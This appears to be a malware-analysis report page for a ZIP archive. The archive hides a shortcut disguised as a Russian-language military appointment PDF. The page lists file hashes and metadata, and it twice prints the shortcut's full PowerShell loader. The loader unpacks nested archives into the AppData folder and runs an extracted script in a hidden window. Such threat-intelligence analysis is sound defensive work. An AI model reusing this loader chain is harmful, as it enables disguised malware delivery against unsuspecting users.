49bd706f689f1067fb5de679cd8acc4e

ZIP Archive
|
MD5: 49bd706f689f1067fb5de679cd8acc4e
|
Size: 8.4 MB
|
application/zip

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	49bd706f689f1067fb5de679cd8acc4e
Sha1	e900d34e86663e2f6b0b49c02dc183e0ed450c98
Sha256	33166eb79737407d15fd23d5644c3bc544ae4a63604712eefa72fb8d989cb3b5
Sha384	2e27f51fb7b5917b1cb85ba640d7f42aff2212d46c279858cff50e18da189cf3627e67589c6efa9923f713f948c719a7
Sha512	5139a1f967dea8c8174028dae333679931db2d2e385083127c723cf0a5bdda36d103a8ba13b6bf691b1543344053c97adf990695bf54d099ffff776aacf44cce
SSDeep	196608:EV46s93CGhH8uGY8+iDdLQWfd9HI2eQMy/1EGh59tY:lCGpT8+i5LvFRI0My9EGtS
TLSH	C786338052F5F9E3871326E0837CF26150ED9E1FEBB36504E46A8A05F47A8F8067F599

File Structure

Informations

Name0	Value
Исх №6626 Представление на назначение на воинскую должность.pdf	1.7
Исх №6626 Представление на назначение на воинскую должность.pdf	D:20250901020936-07'00'
Исх №6626 Представление на назначение на воинскую должность.pdf	Adobe Acrobat 22.1
Исх №6626 Представление на назначение на воинскую должность.pdf	D:20250901021016-07'00'
Исх №6626 Представление на назначение на воинскую должность.pdf	Adobe Acrobat 22.1 Image Conversion Plug-in
Исх №6626 Представление на назначение на воинскую должность.pdf	D:20250901020936-07'00'
Исх №6626 Представление на назначение на воинскую должность.pdf	Adobe Acrobat 22.1
Исх №6626 Представление на назначение на воинскую должность.pdf	D:20250901021016-07'00'
Исх №6626 Представление на назначение на воинскую должность.pdf	Adobe Acrobat 22.1 Image Conversion Plug-in

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe $activeResourceCode=$env:USERPROFILE+'\Downloads\Исх №6626 Представление на назначение на воинскую должность.pdf.zip'; Expand-Archive $activeResourceCode -DestinationPath $env:APPDATA\levelLevel; $activeResourceCode=$env:APPDATA+'\levelLevel\System Volume Information\searchTrigger'; $permanentLicenseRange=$activeResourceCode+'.zip'; Rename-Item -Path $activeResourceCode -NewName $permanentLicenseRange; Expand-Archive -Path $permanentLicenseRange -DestinationPath $env:APPDATA\spotify; $photoLabel = gc $env:APPDATA\spotify\finalSignalLimit; Start-Process -WindowStyle Hidden powershell $photoLabel
Deobfuscated PowerShell	$photoLabel

Name0

Value

LNK: Command Execution

Deobfuscated PowerShell

49bd706f689f1067fb5de679cd8acc4e (8.4 MB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe $activeResourceCode=$env:USERPROFILE+'\Downloads\Исх №6626 Представление на назначение на воинскую должность.pdf.zip'; Expand-Archive $activeResourceCode -DestinationPath $env:APPDATA\levelLevel; $activeResourceCode=$env:APPDATA+'\levelLevel\System Volume Information\searchTrigger'; $permanentLicenseRange=$activeResourceCode+'.zip'; Rename-Item -Path $activeResourceCode -NewName $permanentLicenseRange; Expand-Archive -Path $permanentLicenseRange -DestinationPath $env:APPDATA\spotify; $photoLabel = gc $env:APPDATA\spotify\finalSignalLimit; Start-Process -WindowStyle Hidden powershell $photoLabel Malicious	49bd706f689f1067fb5de679cd8acc4e > Исх №6626 Представление на назначение на воинскую должность.pdf.lnk
Deobfuscated PowerShell	$photoLabel Malicious	49bd706f689f1067fb5de679cd8acc4e > Исх №6626 Представление на назначение на воинскую должность.pdf.lnk > LNK CommandLine > [PowerShell Command]

You must be signed in to post a comment.